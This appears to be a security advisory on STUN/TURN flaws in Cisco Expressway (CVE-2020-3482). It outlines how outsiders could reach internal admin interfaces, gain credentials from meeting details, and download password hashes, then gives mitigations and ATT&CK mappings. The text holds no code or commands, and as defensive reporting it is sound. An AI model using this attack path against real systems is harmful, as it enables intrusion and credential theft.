Get in Touch
A security researcher has demonstrated some vulnerabilities in Cisco’s Expressway gateway devices. The STUN protocol (and its extension TURN) is normally used by video conferencing software to find the best way to route communications, avoiding some limitations of NAT networks. When misused, though, this can allow outsiders to bypass firewall restrictions and access internal resources.
Cisco has published an advisory for CVE-2020-3482, which would allow access to internal admin interfaces. There’s no patch for this as their own admin interface is password protected and they say that fixing it would be difficult due to their architecture. Expressway owners should be aware that enabling TURN services can allow malicious outsiders access to internal resources.
Accessing the interface requires valid credentials, but the researcher also showed how these could be gained by anyone with a meeting invitation or a valid telephone number (often published on a company website). Once able to connect to the internal interface, a logged-in user can download a configuration backup with password hashes. They are said to be working on a fix to prevent read-only users from accessing such sensitive data.
The researcher also found a memory leak bug but Cisco says that the information leaked originates with the attacker, so there are no security implications.
A remote attacker could proxy their traffic through a STUN server to access resources on an internal network.
An attacker with valid meeting details could be able to download sensitive data including password hashes from the internal web interface.
The researcher has released a tool called STUNNER on GitHub to test networks for these vulnerabilities.
Cisco Expressway with open STUN/TURN services.
Containment, Mitigations & Remediations
Disabling TURN services would prevent attacks but could also break video conferencing functionality.
Web-based admin panels should use strong passwords, even when they are not known to be externally facing.
Cisco Expressway devices should be segregated on the network to prevent them relaying access to other internal devices.
Given that Cisco doesn’t appear to be addressing this issue properly, it may be worth considering other video conferencing solutions.
Indicators of Compromise
The Shodan search engine showsmore than 20,000 Expressway servers that may be vulnerable.
By their nature, STUN/TURN servers are made to get around firewalls and architectural constraints that prevent direct connections. This attack just goes to show some of the complexities that can arise from adding new services to a network.
T1210 – Exploitation of Remote Services
T1528 – Steal Application Access Token
T1212 – Exploitation for Credential Access
T1110.002 – Password Cracking